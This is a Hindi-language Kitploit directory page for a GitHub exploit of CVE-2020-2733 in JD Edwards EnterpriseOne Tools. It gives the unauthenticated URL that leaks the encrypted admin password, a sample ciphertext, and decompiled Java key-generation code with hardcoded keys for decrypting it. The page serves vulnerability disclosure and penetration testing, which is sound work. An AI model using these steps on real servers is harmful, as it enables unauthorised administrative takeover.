Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-2733 — JD Edwards EnterpriseOne Tools में CVE-2020-2733 के लिए शोषण, अप्रमाणित व्यवस्थापक पासवर्ड डिक्रिप्शन और प्रमाणीकरण बाईपास प्रदर्शित करता है ताकि व्यवस्थापक अधिकार प्राप्त किए जा सकें। | Kitploit
उपकरण/GitHubGitHub/anmolksachan/cve-2020-2733
एन्क्रिप्शन/डिक्रिप्शन उपकरणपासवर्ड हमलेभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगगलत कॉन्फ़िगरेशन
GitHubanmolksachan/cve-2020-2733

CVE-2020-2733

JD Edwards EnterpriseOne Tools में CVE-2020-2733 के लिए शोषण, अप्रमाणित व्यवस्थापक पासवर्ड डिक्रिप्शन और प्रमाणीकरण बाईपास प्रदर्शित करता है ताकि व्यवस्थापक अधिकार प्राप्त किए जा सकें।

122 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

CVE-2020-2733 - JD Edwards EnterpriseOne Tools व्यवस्थापक पासवर्ड पर्याप्त रूप से सुरक्षित नहीं है

चित्र
चित्र 1: स्ट्रिंग को डिक्रिप्ट करें
चित्र
चित्र 2: URL देकर डिक्रिप्ट करें

[CVE-2020-2733]

एप्लिकेशन: JD Edwards EnterpriseOne Tools
प्रभावित संस्करण: JD Edwards EnterpriseOne Tools 9.2
विक्रेता URL: https://oracle.com/
बग: सूचना प्रकटीकरण
रिपोर्ट किया गया: 18 सितंबर, 2019
सार्वजनिक सलाह की तिथि: 23 अगस्त, 2022
संदर्भ: [https://www.oracle.com/security-alerts/cpuapr2020.html, https://redrays.io/cve-2020-2733-jd-edwards/]
पता लगाने के लिए Nuclei टेम्पलेट: https://github.com/projectdiscovery/nuclei-templates/blob/68f0ad5fa2f54a08959e2d68633174750fcb4952/http/cves/2020/CVE-2020-2733.yaml#L2

विवरण

सलाहकार सूचना
शीर्षक: [CVE-2020-2733] JD Edwards EnterpriseOne Tools व्यवस्थापक पासवर्ड पर्याप्त रूप से सुरक्षित नहीं है
जोखिम: गंभीर
सलाह URL: https://redrays.io/cve-2020-6369-patch-bypass/
प्रकाशन तिथि: 23.08.2022

भेद्यता सूचना


दूरस्थ रूप से शोषणीय: हाँ
स्थानीय रूप से शोषणीय: नहीं


CVSS जानकारी : CVSS v3.1 Base Score: 9.8 / 10 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

भेद्यता विवरण

JD Edwards EnterpriseOne Tools 9.2 या उससे निचले संस्करण अनधिकृत हमलावरों को प्रमाणीकरण को बायपास करने और सिस्टम पर व्यवस्थापक अधिकार प्राप्त करने की अनुमति देते हैं।

तकनीकी विवरण

यह भेद्यता Oracle JD Edwards Management पोर्टल में पाई गई थी। भेद्यता को पुन: उत्पन्न करने के लिए, आपको (बिना प्रमाणीकरण के) निम्नलिखित URL खोलना होगा

http://JDEdwards:8999/manage/fileDownloader?sec=1

जब आप URL खोलते हैं, तो आप पृष्ठ में छद्म-यादृच्छिक पाठ देख सकते हैं। unnamed-2-e1661254647723

root@kitploit:~
ACHCJKGJHCJKBLLALOLOJFCABEFHOALDDAOFNGGANPDB


JD Edwards jar फ़ाइलों का विश्लेषण करने के बाद, हमने पाया कि यह छद्म-यादृच्छिक डेटा – एन्क्रिप्टेड व्यवस्थापक पासवर्ड है!

एन्क्रिप्शन कुंजियाँ निम्नलिखित फ़ंक्शन में स्थित हैं

root@kitploit:~
private static void genKeys(byte[] paramArrayOfByte1, byte[] paramArrayOfByte2, byte paramByte)
{
int i = 0;
byte[] arrayOfByte1 = { 65, 4, 95, 12, 88, 41, 6, 114, 119, 93, 37, 68, 75, 19, 49, 46 };
byte[] arrayOfByte2 = { 107, 34, 26, 94, 68, 41, 119, 48, 3, 88, 28, 97, 5, Byte.MAX_VALUE, 77, 54 };
byte[] arrayOfByte3 = { 36, 89, 113, 109, 38, 15, 7, 66, 76, 115, 16, 53, 106, 94, 27, 56 };
int j = paramByte >> 4;
int k = paramByte & 0xF;
int m = arrayOfByte3[j];
for (i = 0; i < 16; i++) {
paramArrayOfByte1[i] = ((byte)(arrayOfByte1[i] ^ m));
}
m = arrayOfByte3[k];
for (i = 0; i < 16; i++) {
paramArrayOfByte2[i] = ((byte)(arrayOfByte2[i] ^ m));
}
}

परिणामस्वरूप, आपको एक व्यवस्थापक पासवर्ड मिलेगा, और आप JD Edwards पोर्टल में कोई भी एप्लिकेशन तैनात कर सकते हैं। चित्र

संदर्भ/ क्रेडिट: https://redrays.io/blog/cve-2020-2733-jd-edwards/

टूल डाउनलोड करें